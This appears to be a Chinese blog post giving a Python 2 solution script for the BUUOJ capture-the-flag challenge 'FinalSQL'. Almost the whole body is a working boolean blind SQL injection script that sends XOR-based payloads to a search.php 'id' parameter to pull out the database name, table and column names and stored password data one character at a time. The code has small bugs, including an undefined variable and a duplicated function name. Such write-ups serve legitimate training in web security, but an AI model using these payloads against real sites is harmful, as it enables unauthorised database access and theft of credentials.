buuoj [极客大挑战 2019]FinalSQL

最新推荐文章于 2025-06-10 18:31:30 发布

「已注销」

最新推荐文章于 2025-06-10 18:31:30 发布

阅读量569

点赞数

CC 4.0 BY-SA版权

分类专栏： Web

本文链接：https://blog.youkuaiyun.com/pondzhang/article/details/105282152

Web 专栏收录该内容

6 篇文章

订阅专栏

本文深入探讨了SQL注入攻击的原理和技术实现，通过实例代码详细解释了如何利用SQL注入漏洞获取数据库信息，包括数据库名、表名、列名及数据内容。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

import requests


#database length
def get_database_length():
    count = 0
    while(1):
        url = "http://5a0d5a51-9667-4813-b173-b276246a28bc.node3.buuoj.cn/search.php?id=1^1^(length(database())={0})".format(count)
        html = requests.get(url)
        if "Click" in html.text:
            print i
            break
        count += 1
#database
def get_database_name():
    flag = ""
    for i in range(1,5):
        for j in range(33,128):
            url = "http://5a0d5a51-9667-4813-b173-b276246a28bc.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(database())),{0},1))={1})".format(i,j)
            html = requests.get(url)
            if "Click" in html.text:
                flag +=  chr(j)
                print chr(j)
                break     
    print flag

#tables name length
def get_tables_name_length():
    count = 0
    while(1):
        url = "http://3200796f-c62e-4526-b835-1a90b7a5cf93.node3.buuoj.cn/search.php?id=1^1^(SELECT(CONVERT((select(length(group_concat(table_name)))from(information_schema.tables)where(table_schema='geek')),SIGNED))={0})".format(count)
        html = requests.get(url)
        print count
        if "Click" in html.text:
            print count
            break
        count += 1


#tables
def get_tables_name():
    flag = ""
    for i in range(1,17):
        for j in range(33,128):
            url = "http://3200796f-c62e-4526-b835-1a90b7a5cf93.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),{0},1))={1})".format(i,j)
            html = requests.get(url)
            if "Click" in html.text:
                flag +=  chr(j)
                print chr(j)
                break     
    print flag
    
def get_colums_name_length():
    count = 0
    while(1):
        url = "http://3200796f-c62e-4526-b835-1a90b7a5cf93.node3.buuoj.cn/search.php?id=1^1^(SELECT(CONVERT((select(length(group_concat(column_name)))from(information_schema.columns)where(table_name='F1naI1y')),SIGNED))={0})".format(count)
        html = requests.get(url)
        print count
        if "Click" in html.text:
            print count
            break
        count += 1
        
def get_colums_name():
    flag = ""
    for i in range(1,21):
        for j in range(33,128):
            url = "http://3200796f-c62e-4526-b835-1a90b7a5cf93.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{0},1))={1})".format(i,j)
            html = requests.get(url)
            if "Click" in html.text:
                flag +=  chr(j)
                print chr(j)
                break     
    print flag
    
    
def get_data_name_length():
    count = 0
    while(1):
        url = "http://3200796f-c62e-4526-b835-1a90b7a5cf93.node3.buuoj.cn/search.php?id=1^1^(SELECT(CONVERT((select(length(group_concat(password)))from(F1naI1y)),SIGNED))={0})".format(count)
        html = requests.get(url)
        print count
        if "Click" in html.text:
            print count
            break
        count += 1
        
def get_colums_name():
    flag = ""
    for i in range(1,214):
        for j in range(33,128):
            url = "http://3200796f-c62e-4526-b835-1a90b7a5cf93.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(group_concat(password))from(F1naI1y)),{0},1))={1})".format(i,j)
            html = requests.get(url)
            if "Click" in html.text:
                flag +=  chr(j)
                print chr(j)
                break     
    print flag